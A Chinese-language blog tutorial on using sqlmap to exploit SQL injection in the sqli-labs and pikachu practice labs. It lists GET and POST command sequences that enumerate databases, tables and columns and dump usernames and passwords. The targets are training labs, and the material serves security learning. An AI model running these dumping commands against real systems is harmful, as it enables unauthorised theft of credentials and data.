标签:sqlmap users GET python 数据库 py POST id 注入
环境的准备:
Python 3.8,Windows操作系统,Sqlmap。
Sqlmap简介:
Sqlmap是开源的自动化SQL注入工具,由Python写成。它支持的数据库有MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。
GET注入的一般步骤:
python sqlmap.py -h #查看可使用指令 python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" #判断注入点 python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" --dbs #查看所有数据库名 python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" -D security --tables #查看security数据库中的所有表名 python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" -D security -T users --columns #查看security数据库中users表的所有字段名 python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" -D security -T users -C id,password,username --dump #查看security数据库中users表的id,password,username的字段信息
POST注入的一般步骤:
使用burpsuite进行抓包,将数据包保存在txt文件中
python sqlmap.py -r C:\Users\Desktop\1234.txt python sqlmap.py -r C:\Users\Desktop\1234.txt --dbs python sqlmap.py -r C:\Users\Desktop\1234.txt -D pikachu --tables python sqlmap.py -r C:\Users\Desktop\1234.txt -D pikachu -T users --columns python sqlmap.py -r C:\Users\Desktop\1234.txt -D pikachu -T users -C id,password,username --dump
GET注入实战:
目标网站:sqli-labs靶场
1.查看sqlmap可使用的指令
2.在网站中输入参数,判断是否存在注入点
3.查看数据库信息
4.查看security数据库中的所有表名
5.查看security数据库中users表的所有字段名
6.查看security数据库中users表的id,password,username的字段信息,可以看到sqli-labs靶场数据库的所有账号密码信息
POST注入实战:
目标网站:pikachu靶场
1.在pikachu靶场填入表单信息,使用burpsuite进行抓包,将其保存到txt文件中
2.判断是否存在注入点
3.查看数据库信息
4.查看pikachu数据库中的所有表名
5.查看pikachu数据库中users表的所有字段名
6.查看pikachu数据库中users表的id,password,username的字段信息,可以看到pikachu靶场数据库的所有账号密码信息
标签:sqlmap,users,GET,python,数据库,py,POST,id,注入 来源: https://www.cnblogs.com/AjieBlog/p/16406973.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。